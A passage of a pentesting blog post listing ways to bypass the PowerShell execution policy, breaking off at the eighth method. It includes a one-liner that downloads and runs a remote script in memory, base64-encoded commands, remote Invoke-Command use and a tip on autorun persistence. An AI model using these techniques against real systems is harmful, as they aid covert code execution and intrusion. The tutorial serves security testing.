<script type="text/javascript">function essb_window606354726(oUrl, oService) { essb_window_stat(oUrl, oService, 1107); essb_ga_tracking(oService, "inline", "https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/"); }; function essb_pinterenst606354726() {essb_ga_tracking("pinterest", "inline", "https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/"); essb_pinterenst_stat(1107); };</script> </div>
<div class="entry-content">
<p> By default PowerShell is configured to prevent the execution of
PowerShell scripts on Windows systems. This can be&nbsp;a hurdle for
penetration testers, sysadmins,&nbsp;and developers, but it doesn't have
to be. In this blog I'll cover 15 ways to bypass the&nbsp;PowerShell
execution policy without having local administrator rights on the
system. I'm sure there are many techniques that I've missed (or simply
don't know about), but hopefully this cheat sheet will&nbsp;offer
a&nbsp;good start for those who need it. </p>
<h3> What is the PowerShell Execution Policy? </h3>
<p> The PowerShell execution policy is the setting that determines which
type of PowerShell scripts (if any) can be run on the system. By
default it is set to “<a target="_blank" href="http://technet.microsoft.com/en-us/library/ee176961.aspx">Restricted</a>“,
which basically means none. However, it's important to understand that
the setting was never meant to be a security control. Instead, it was
intended to prevent administrators from shooting themselves in the foot.
That's why there are so many&nbsp;options for working around it.
Including a few that Microsoft has provided.&nbsp;&nbsp;For more
information on the execution policy settings and other default security
controls in PowerShell I suggest reading <a target="_blank" href="http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html">Carlos Perez's blog</a>. He provides a nice overview. </p>
<h3>Why Would I Want to Bypass the Execution Policy?</h3>
<p> Automation seems to be one of the more common responses I hear from
people, but below are a few other reasons PowerShell has become so
popular with administrators, pentesters, and
hackers.&nbsp;&nbsp;PowerShell is: </p>
<ul>
<li>Native to Windows</li>
<li>Able to call the Windows API</li>
<li>Able to run commands without writing to the disk</li>
<li>Able to avoid detection by Anti-virus</li>
<li>Already flagged as “trusted” by most application white list solutions</li>
<li>A medium used to write many open source Pentest toolkits </li>
</ul>
<h3>How to View the Execution Policy</h3>
<p> Before being able to use all of the wonderful features PowerShell
has to offer, attackers may have to bypass the “Restricted” execution
policy.&nbsp; You can take a look at the current configuration with the
“Get-ExectionPolicy” PowerShell command. If you're looking at&nbsp;the
setting for the first time it's likely set to “Restricted” as shown
below. </p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b27198635982" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b27198635982-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b27198635982-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b27198635982-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b27198635982-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b27198635982-2"><span class="crayon-i">PS</span><span class="crayon-h"> </span><span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-o">&gt;</span><span class="crayon-h"> </span><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-i">ExecutionPolicy</span></div><div class="crayon-line" id="crayon-54d381c939b27198635982-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p>
</p><p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_1.png"> </p>
<p> It's also worth noting that the execution policy can be set at
different levels on the system.&nbsp;&nbsp; To view a list of them use
the command below.&nbsp; For more information you can check out
Microsoft's “Set-ExecutionPolicy” page <a href="http://technet.microsoft.com/en-us/library/hh849812.aspx">here</a>.&nbsp; </p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b35564975663" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b35564975663-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b35564975663-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b35564975663-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b35564975663-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b35564975663-2"><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-v">ExecutionPolicy</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">List</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">Format</span><span class="crayon-o">-</span><span class="crayon-v">Table</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">AutoSize</span></div><div class="crayon-line" id="crayon-54d381c939b35564975663-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p>
</p><p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_2.png"> </p>
<h3> Lab Setup Notes </h3>
<p> In the examples below I will use a script named runme.ps1 that
contains the following PowerShell command to write a message to the
console: </p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b3a014702052" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b3a014702052-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b3a014702052-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b3a014702052-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b3a014702052-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b3a014702052-2"><span class="crayon-v">Write</span><span class="crayon-o">-</span><span class="crayon-i">Host</span><span class="crayon-h"> </span><span class="crayon-s">"My voice is my passport, verify me."</span></div><div class="crayon-line" id="crayon-54d381c939b3a014702052-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p>
</p><p> When I attempt to execute it on a system configured with the default execution policy I get the following error: <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_3.png"> </p>
<p> If your current policy is too open and you want to make it more
restrictive to test the techniques below, then run the command
“Set-ExecutionPolicy Restricted” from an administrator PowerShell
console. Ok enough of my babbling below are 15 ways to bypass the
PowerShell execution policy restrictions. </p>
<h3> Bypassing the PowerShell Execution Policy </h3>
<ol>
<li>
<h4>Paste the Script into an Interactive PowerShell Console</h4>
<p> Copy and paste your PowerShell script into an interactive
console as shown below. However, keep in mind that you will be limited
by your current user's privileges. This is the most basic example and
can be handy for running quick scripts when you have an interactive
console. Also, this technique does not result in a configuration change
or require writing to disk.</p>
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_4.png"></p></li>
<li>
<h4>Echo the Script and Pipe it to PowerShell Standard In</h4>
<p> Simply ECHO your script into PowerShell standard input. This
technique does not result in a configuration change or require writing
to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b40529140660" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b40529140660-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b40529140660-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b40529140660-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b40529140660-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b40529140660-2"><span class="crayon-e">Echo </span><span class="crayon-v">Write</span><span class="crayon-o">-</span><span class="crayon-i">Host</span><span class="crayon-h"> </span><span class="crayon-s">"My voice is my passport, verify me."</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">noprofile</span><span class="crayon-h"> </span><span class="crayon-o">-</span></div><div class="crayon-line" id="crayon-54d381c939b40529140660-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_5.png"></p></li>
<li>
<h4>Read Script from a File and Pipe to PowerShell Standard In</h4>
<p> Use the Windows “type” command or PowerShell “Get-Content”
command to read your script from the disk and pipe it into PowerShell
standard input. This technique does not result in a configuration
change, but does require writing your script to disk. However, you
could read it from a network share if you're trying to avoid writing to
the disk.</p>
<p> <em>Example 1: Get-Content PowerShell command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b45600922147" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b45600922147-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b45600922147-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b45600922147-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b45600922147-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b45600922147-2"><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-i">Content</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">noprofile</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-h"> </span></div><div class="crayon-line" id="crayon-54d381c939b45600922147-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_6.png"></p>
<p> <em>Example 2: Type command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b4a112289773" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b4a112289773-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b4a112289773-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b4a112289773-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b4a112289773-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b4a112289773-2"><span class="crayon-i">TYPE</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">noprofile</span><span class="crayon-h"> </span><span class="crayon-o">-</span></div><div class="crayon-line" id="crayon-54d381c939b4a112289773-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_7.png"></p></li>
<li>
<h4>Download Script from URL and Execute with Invoke Expression</h4>
<p> This technique can be used to download a PowerShell script from
the internet and execute it without having to write to disk. It also
doesn't result in any configuration changes. I have seen it used in
many creative ways, but most recently saw it being referenced in a nice
PowerSploit blog by Matt Graeber.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b72184644566" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b72184644566-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b72184644566-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b72184644566-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b72184644566-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b72184644566-2"><span class="crayon-v">powershell</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">nop</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">c</span><span class="crayon-h"> </span><span class="crayon-s">"iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"</span></div><div class="crayon-line" id="crayon-54d381c939b72184644566-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_8.png"></p></li>
<li>
<h4>Use the Command Switch</h4>
<p> This technique is very similar to executing a script via copy
and paste, but it can be done without the interactive console. It's
nice for simple script execution, but more complex scripts usually end
up with parsing errors. This technique does not result in a
configuration change or require writing to disk.</p>
<p> <em>Example 1: Full command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b77851534058" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b77851534058-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b77851534058-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b77851534058-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b77851534058-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b77851534058-2"><span class="crayon-v">Powershell</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">command</span><span class="crayon-h"> </span><span class="crayon-s">"Write-Host 'My voice is my passport, verify me.'"</span></div><div class="crayon-line" id="crayon-54d381c939b77851534058-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_9.png"></p>
<p> <em>Example 2: Short command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b7c333377731" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b7c333377731-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b7c333377731-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b7c333377731-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b7c333377731-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b7c333377731-2"><span class="crayon-v">Powershell</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">c</span><span class="crayon-h"> </span><span class="crayon-s">"Write-Host 'My voice is my passport, verify me.'"</span></div><div class="crayon-line" id="crayon-54d381c939b7c333377731-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p> It may also be worth noting that you can place these types of
PowerShell commands into batch files and place them into autorun
locations (like the all users startup folder) to help during privilege
escalation.</p></li>
<li>
<h4>Use the EncodeCommand Switch</h4>
<p> This is very similar to the “Command” switch, but all scripts
are provided as a Unicode/base64 encoded string. Encoding your script
in this way helps to avoid all those nasty parsing errors that you run
into when using the “Command” switch. This technique does not result in
a configuration change or require writing to disk. The sample below
was taken from Posh-SecMod. The same toolkit includes a nice little
compression method for reducing the size of the encoded commands if they
start getting too long.</p>
<p> <em>Example 1: Full command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b81910645126" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b81910645126-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b81910645126-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b81910645126-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b81910645126-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b81910645126-2"><span class="crayon-sy">$</span><span class="crayon-v">command</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-s">"Write-Host 'My voice is my passport, verify me.'"</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">bytes</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-sy">[</span><span class="crayon-v">System</span><span class="crayon-sy">.</span><span class="crayon-v">Text</span><span class="crayon-sy">.</span><span class="crayon-v">Encoding</span><span class="crayon-sy">]</span><span class="crayon-o">::</span><span class="crayon-v">Unicode</span><span class="crayon-sy">.</span><span class="crayon-e">GetBytes</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">command</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">encodedCommand</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-sy">[</span><span class="crayon-v">Convert</span><span class="crayon-sy">]</span><span class="crayon-o">::</span><span class="crayon-e">ToBase64String</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">bytes</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">powershell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">EncodedCommand</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-i">encodedCommand</span></div><div class="crayon-line" id="crayon-54d381c939b81910645126-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0015 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_10.png"></p>
<p> <em>Example 2: Short command using encoded string</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b8d563718853" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b8d563718853-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b8d563718853-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b8d563718853-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b8d563718853-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b8d563718853-2"><span class="crayon-v">powershell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">Enc </span><span class="crayon-i">VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA</span></div><div class="crayon-line" id="crayon-54d381c939b8d563718853-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> </p></li>
<li>
<h4>Use the Invoke-Command Command</h4>
<p> This is a fun option that I came across on the Obscuresec blog.
It's typically executed through an interactive PowerShell console or
one liner using the “Command” switch, but the cool thing is that it can
be used to execute commands against remote systems where PowerShell
remoting has been enabled. This technique does not result in a
configuration change or require writing to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b93360336458" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b93360336458-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b93360336458-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b93360336458-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b93360336458-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b93360336458-2"><span class="crayon-e">invoke</span><span class="crayon-o">-</span><span class="crayon-e">command</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">scriptblock</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-v">Write</span><span class="crayon-o">-</span><span class="crayon-i">Host</span><span class="crayon-h"> </span><span class="crayon-s">"My voice is my passport, verify me."</span><span class="crayon-sy">}</span></div><div class="crayon-line" id="crayon-54d381c939b93360336458-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_11.png"></p>
<p> Based on the Obscuresec blog, the command below can also be used
to grab the execution policy from a remote computer and apply it to the
local computer.</p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b98014955092" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b98014955092-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b98014955092-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b98014955092-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b98014955092-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b98014955092-2"><span class="crayon-e">invoke</span><span class="crayon-o">-</span><span class="crayon-e">command</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">computername</span><span class="crayon-h"> </span><span class="crayon-e">Server01</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">scriptblock</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-v">get</span><span class="crayon-o">-</span><span class="crayon-v">executionpolicy</span><span class="crayon-sy">}</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">set</span><span class="crayon-o">-</span><span class="crayon-v">executionpolicy</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">force</span></div><div class="crayon-line" id="crayon-54d381c939b98014955092-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0008 seconds] -->
<p> </p></li>
<li>
<h4>Use the Invoke-Expression Command</h4>
<p> This is another one that's typically executed through an
interactive PowerShell console or one liner using the “Command” switch.
This technique does not result in a configuration change or require
writing to disk. Below I've listed are a few common ways to use
Invoke-Expression to bypass the execution policy.</p>
<p> <em>Example 1: Full command using Get-Content</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
